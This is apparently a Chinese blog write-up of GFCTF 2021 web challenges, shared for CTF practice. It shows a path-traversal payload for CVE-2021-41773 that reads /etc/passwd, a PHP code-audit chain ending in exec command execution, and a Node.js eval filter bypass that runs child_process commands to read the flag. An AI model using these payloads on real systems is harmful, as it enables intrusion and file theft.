2021GFCTF

最新推荐文章于 2024-04-09 13:55:41 发布
最新推荐文章于 2024-04-09 13:55:41 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: CTF训练日记 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/125657890
版权

文章目录

复现环境

https://www.ctfer.vip/problem

GFCTF 2021 Baby_web

考点

  1. Apache 2.4.49的一个目录穿越的cve漏洞

  2. 利用exec外带命令执行

wp

看到Apache的版本号是2.4.49,相信很多小伙伴已经意识到前段时间爆出来的CVE-2021-41773

payload

/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

image-20220707113732070

拿到源码

index.php

<?php
error_reporting(0);
define("main","main");
include "Class.php";
$temp = new Temp($_POST);//入口
$temp->display($_GET['filename']);//进入display函数,后续进行文件包含
?>

Class.php

<?php
defined('main') or die("no!!");
Class Temp{
    private $date=['version'=>'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];
    private $template;
    public function __construct($data){

        $this->date = array_merge($this->date,$data); //把一个或多个数组合并为一个数组
    }
    public function getTempName($template,$dir){
        if($dir === 'admin'){  //需要进入这一层
            $this->template = str_replace('..','','./template/admin/'.$template);//此目录下的任意文件
            if(!is_file($this->template)){
                die("no!!");
            }
        }
        else{
            $this->template = './template/index.html';
        }
    }
    public function display($template,$space=''){

        extract($this->date);//变量覆盖 将date数组覆盖掉
        $this->getTempName($template,$space);//让$template为index.html $space为admin
        include($this->template);//包含文件 需要包含./template/admin/index.html
    }
    public function listdata($_params){
        $system = [
            'db' => '',
            'app' => '',
            'num' => '',
            'sum' => '',
            'form' => '',
            'page' => '',
            'site' => '',
            'flag' => '',
            'not_flag' => '',
            'show_flag' => '',
            'more' => '',
            'catid' => '',
            'field' => '',
            'order' => '',
            'space' => '',
            'table' => '',
            'table_site' => '',
            'total' => '',
            'join' => '',
            'on' => '',
            'action' => '',
            'return' => '',
            'sbpage' => '',
            'module' => '',
            'urlrule' => '',
            'pagesize' => '',
            'pagefile' => '',
        ];

        $param = $where = [];

        $_params = trim($_params); //去掉数组前后的空格

        $params = explode(' ', $_params);
        if (in_array($params[0], ['list','function'])) { //以空格为分隔符将字符串分割为数组
            $params[0] = 'action='.$params[0];
        }
        foreach ($params as $t) { //遍历新生成的数组
            $var = substr($t, 0, strpos($t, '=')); //var 为等号 前 的内容
            $val = substr($t, strpos($t, '=') + 1);//val 为等号 后 的内容
            if (!$var) {
                continue;
            }
            if (isset($system[$var])) { //存在$system[$var]就重新赋值
                $system[$var] = $val;
            } else {
                $param[$var] = $val; //不存在就放在$param这个数组里
            }
        }
        // action
        switch ($system['action']) {

            case 'function':

                if (!isset($param['name'])) {
                    return  'hacker!!';
                } elseif (!function_exists($param['name'])) {
                    return 'hacker!!';
                }

                $force = $param['force'];
                if (!$force) {
                    $p = [];
                    foreach ($param as $var => $t) {
                        if (strpos($var, 'param') === 0) { //判断键名是否以param开头
                            $n = intval(substr($var, 5)); //intval()处理字符串直接返回0 
                            $p[$n] = $t;        //--------->可以有 $p[0]=$t
                        }
                    }
                    if ($p) {

                        $rt = call_user_func_array($param['name'], $p); //利用点
                    } else {
                        $rt = call_user_func($param['name']);
                    }
                    return $rt;
                }else{
                    return null;
                }
            case 'list':
                return json_encode($this->date);
        }
        return null;
    }
}

/template/admin/index.html

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>后台</title>
</head>
<body>
<!--<img src="<?php echo $img;?>">-->
<div><?php echo $this->listdata("action=list module=$mod");//$mod参数可控,用这里调用listdata
    ?><div> 
    <h6>version: <?php echo $version;?></h6>
</body>
</html>

审完代码,利用点在Class.php中的call_user_func_array

代码逻辑思路:分析都在上面源码中写了

GET -> display -> getTempName -> include包含
POST-> array_merge -> extract(变量覆盖) -> 由于有include,通过$mod进入listdata -> 一大堆字符串生成新数组 -> switch -> call_user_func_array

payload:

?filename=index.html
space=admin&mod=1 action=function name=phpinfo

image-20220707125836664

disable_functions

看能不能写文件(不能出现空格)

?filename=index.html
space=admin&mod=1 action=function name=exec param1=cat${IFS}/f*>/var/www/html/1

GFCTF 2021 文件查看器

考点

  1. phar反序列化

  2. GC回收机制,触发__destruct

  3. php://filter吃数据

wp

http://arsenetang.com/2021/11/29/WP%E7%AF%87%E4%B9%8B%E8%A7%A3%E6%9E%90GFCTF—%E6%96%87%E4%BB%B6%E6%9F%A5%E7%9C%8B%E5%99%A8/

GFCTF 2021 ez_calc

F12看到源码

if(req.body.username.toLowerCase() !== 'admin' 
&& req.body.username.toUpperCase() === 'ADMIN' 
&& req.body.passwd === 'admin123'){                // 登录成功,设置 session

可以看到密码为admin123,账户名小写后不能为admin,大写之后为ADMIN,

小trick:利用特殊字符,比如通过Character.toUpperCose()后,ı会为I,但它经过Charocter.toLowerCose()后并不是i,所以说账户名为admın,登录成功,登录之后继续查看源码:

let calc = req.body.calc;
let flag = false;
//waf
for (let i = 0; i < calc.length; i++) {
    if (flag || "/(flc'\".".split``.some(v => v == calc[i])) {
        flag = true;
        calc = calc.slice(0, i) + "*" + calc.slice(i + 1, calc.length);
    }
}
//截取
calc = calc.substring(0, 64);
//去空
calc = calc.replace(/\s+/g, "");

calc = calc.replace(/\\/g, "\\\\");

//小明的同学过滤了一些比较危险的东西
while (calc.indexOf("sh") > -1) {
    calc = calc.replace("sh", "");
}
while (calc.indexOf("ln") > -1) {
    calc = calc.replace("ln", "");
}
while (calc.indexOf("fs") > -1) {
    calc = calc.replace("fs", "");
}
while (calc.indexOf("x") > -1) {
    calc = calc.replace("x", "");
}

try {
    result = eval(calc);

}

执行点就是eval函数

代码分析:首先它通过split会对输入的参数的每一位都会进行检查,如果出现了/(flc'\".中的任意字符,就会将后面所有的字符都变成*,然后会将处理后的这个字符串进行截取操作,取前64位,在去除了空格,过滤了危险字符之后,传入eval中,看似非常完美的过滤,肯定是无法传入字符串。

我们可以利用数组:

传入数组["aaaaa","bbbbb",ccccc],这样calc[i]就不再是单个的字符,而变成了一个字符串了;那么calc.length也就是数组中元素的个数,也就是3了;如果传入["aaaaa","bbbbb","(",]的话,那么按照这道题的逻辑,它在第3位发现了危险字符,那么就会将第三位以后的字符都替换成*,也就是处理成:aaa***********

image-20220707135128012

这样看到来)是逃逸出来的

给出payload

calc数组长度一定要大于等于前面执行命令的字符串长度

calc[]=require('child_process').spawnSync('ls',['/']).stdout.toString();&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=.

发现flag的名字很长,直接读取的话长度不够,而且这里过滤了x,也无法直接利用exec,但是实际上这里是可以绕过的,因为我们通过require导入的模块是一个Object,那么就可以通过Object.values获取到child_process里面的各种方法,那么再通过数组下标[5]就可以得到execSync了,那么有了execSync后就可以通过写入文件的方式读取flag了,payload如下:

calc[]=Object.values(require('child_process'))[5]('cat${IFS}/G*>p')&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=.

最后直接回显:

calc[]=require('child_process').spawnSync('nl',['p']).stdout.toString();&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=1&calc[]=.

12

Z3eyOnd
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021CTF工业信息安全技能大赛(杭州站)
08-02
2021CTF工业信息安全技能大赛(杭州站)
[GFCTF 2021]wordy
qq_61156124的博客
04-13 249
利用idapython脚本解决重复工作 startaddr = 0x1135 endaddr = 0x3100 for i in range(startaddr,endaddr): if get_wide_byte(i) == 0xEB: if get_wide_byte(i+1) == 0xFF: patch_byte(i,0x90) print("[+] Addr {} is patched".format(hex(i)))再修改部分代码使程序能正常执行,最后运行直接打印出flag。
[GFCTF2021] NSS wp
bestkasscn的博客
11-22 2953
[GFCTF2021] NSS wp 文章目录[GFCTF2021] NSS wpwebBaby_webMISC重生之我在A国当间谍双击开始冒险REwordySIGNIN web Baby_web 根据源码的提示,直接用御剑扫一波后台(早上做的时候可以扫到1.php和a.php,下午复现的时候扫不到了。。) 访问a.php,ctrl + F搜索GF直接就找到了flag。。 MISC 重生之我在A国当间谍 打开是个压缩包,解压后有两个东西 很明显flag.rar的密码要去secret找,点开secr
GFCTF 2021 where_is_shell
最新发布
2301_79793667的博客
04-09 243
要构造的payload就是首先需要覆盖返回地址,使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0)。发现定义了一个字符串buf,距栈底距离为0x10,并且有一个read函数,再检查附件其他内容并没有发现bin/sh,但是发现了一个tips,跳转到该地址进行查看。只需要取它地址后一位就可以了也就是取到0x400541就能得到$0的机器码。
GFCTF2021_misc
M3ng@L的博客
01-19 595
GFCTF2021_misc_复现 pikapikapika 首先是一个图像文件 根据大概英文意思,在图上按顺序拼接出一个字符串 I_want_a_p1ka! 交了两次flag,发现没对 使用010editor打开图像文件,发现里面还有个zip文件头以及其数据,提取出来 解压得到一个wav文件,听一听是杂音 使用silent eye发现没有wav文件隐藏 用audacity打开,查看频谱图有没有在频谱上的字符,但是没有 放大波形图,发现各个点呈两种情况分布 很显然正常的波形图不可能只有两种音频 把这
[每日一题][GFCTF 2021]Baby_Web
Sapphire037的博客
11-26 1217
前言 坚持。复现平台https://www.ctfer.vip/ 过程 题目标签写了CVE-2021-41773,路径穿越漏洞,进入环境首先看源码 <h1>Welcome To GFCTF 12th!!</h1> <!--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?--> 网上找payload,bp发包 GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/index.php.txt HTTP/1.1 Hos
[GFCTF2021]文件查看器复现
qq_42585535的博客
05-24 241
一键编码脚本。
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
[GFCTF202021]Baby-Web只有代码审计部分
01-02
题解都在里面了,CSDN的文章编写真不方便
[GFCTF 2021]ez_calc day3
qq_62046696的博客
05-08 1106
目录 此时我脑袋产生了几个问题: 但是尝试了几个弱密码发现不对,找一下有没有代码泄露的点。 咦发现ctrl+u查看的源码和f12显示的竟然不一样我丢,涨知识了。 js大小写有漏洞之前遇见过 <!-- if(req.body.username.toLowerCase() !== 'admin' && req.body.username.toUpperCase() === 'ADMIN' && req.body.passwd ===
花指令相关-[GFCTF2021]-wordy,[NSSRound#3 Team]jump_by_jump题解
m0_73393932的博客
03-18 1299
逆向
[GFCTF 2021]文件查看器(GZ、过滤器、phar) day4
qq_62046696的博客
05-10 585
打开界面直接一个登录界面,直接admin/admin登录进去。进来之后发现是一个文件查看器的功能随便输入了点东西发现了报错,然后读取文件的功能,输入Files.classs.php发现读取不成功换了个index.php大概的意思就是new 传入一个类,然后调用类中的方法,推断肯定有别的源码,果断扫目录发现www.zip,里面有几个php文件,然后可以看到每个类中都有几个魔法函数,说明肯定是用他们一起然后构造一个pop链,大致拼接了一下这里有一个点就是)();
[GFCTF 2021]where_is_shell
沈理大学牲的博客
11-13 407
在ROP攻击中,攻击者利用程序中存在的这种gadget,通过精心构造的数据将程序控制流引导到这个gadget,从而实现对程序行为的控制。通常情况下,攻击者会将需要的参数放置在栈上,然后利用ROP链将控制流引导到 "pop rdi;ret" 这样的gadget,将参数加载到合适的寄存器中,然后再执行调用目标函数的ret指令。在x86_64架构中,这个gadget的作用是从栈中弹出一个数值,并将其赋值给RDI寄存器,然后进行返回。先覆盖到地址,然后执行ret,ret用来返回弹出的地址,然后执行pop_rdi;
GFCTF2021 部分WP
mumuzi的博客
11-21 4385
只写我做了的 SignIn GFCTF2021 回复GFCTF,得到base64解码即可 GFCTF{W3lc0me_t0_th3_12th_GFCTF} Misc 重生之我在A国当间谍 secret是PDU编码之后的,一句一句的解就行http://www.sendsms.cn/pdu/ 当然这里不是很多,如果是很多的话可以调用控制台来批量解密 倒数第二句:真让人无语。我把密码告诉你,记住,这个密码不要告诉任何人。WzFlNHJsMFwvZQ== 得到密码 [1e4rl0/e 解压出来是一张被撕毁的二维码
[红明谷CTF 2021]write_shell
yym68686
10-22 606
[红明谷CTF 2021]write_shell 打开网页,发现源代码: <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!');
[GFCTF 2021] day2
qq_62046696的博客
05-07 875
template需要就是传进去index.html,这样才会调用listdata这个方法。--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?发现会调用listdata方法并且需要我们传参 action module。$dir需要是admin,是space传进来的,所以space=admin。/template/admin/ 首先代码中有这一个目录,访问看一下是啥。template也就是filename需要是 index.html。则需要满足 $p存在也就是,在这里需要一个键和值,
CTF训练之路2--ctfshow内部赛
unexpectedthing的博客
11-07 6532
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 6110
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6099
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值